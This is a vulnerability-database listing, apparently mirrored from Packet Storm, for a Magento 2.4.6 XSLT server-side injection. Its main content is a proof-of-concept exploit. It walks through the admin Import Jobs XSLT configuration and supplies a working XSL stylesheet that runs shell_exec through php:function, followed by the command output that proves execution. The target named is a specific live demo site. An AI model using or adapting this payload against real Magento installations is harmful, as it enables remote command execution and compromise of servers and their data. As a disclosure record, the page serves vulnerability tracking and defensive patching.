Lucene search
K

Magento 2.4.6 XSLT Server Side Injection / Command Execution

🗓️ 17 Nov 2023 00:00:00Reported by tmrswrrType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 379 Views

Magento 2.4.6 XSLT Server Side Injection / Command Execution on Demo Sit

Code
`Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection  
# Date: 2023-11-17  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://magento2demo.firebearstudio.com/  
# Software Link: https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip  
# Version: 2.4.6  
# Tested on: 2.4.6  
  
POC:  
  
1 ) Enter with admin creds this url : https://magento2demo.firebearstudio.com/  
2 ) Click SYSTEM > Import Jobs > Entity Type Widget > click edit   
3 ) Click XSLT Configuration and write this payload :   
  
<?xml version="1.0" encoding="utf-8"?>  
<xsl:stylesheet version="1.0"  
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"  
xmlns:php="http://php.net/xsl" >  
<xsl:template match="/">  
<xsl:value-of select="php:function('shell_exec','id')" />  
</xsl:template>  
</xsl:stylesheet>  
  
4 ) Click Test XSL Template , You will be see "id" command result :  
  
<?xml version="1.0"?>  
uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Nov 2023 00:00Current
7.5High risk
Vulners AI Score7.5
379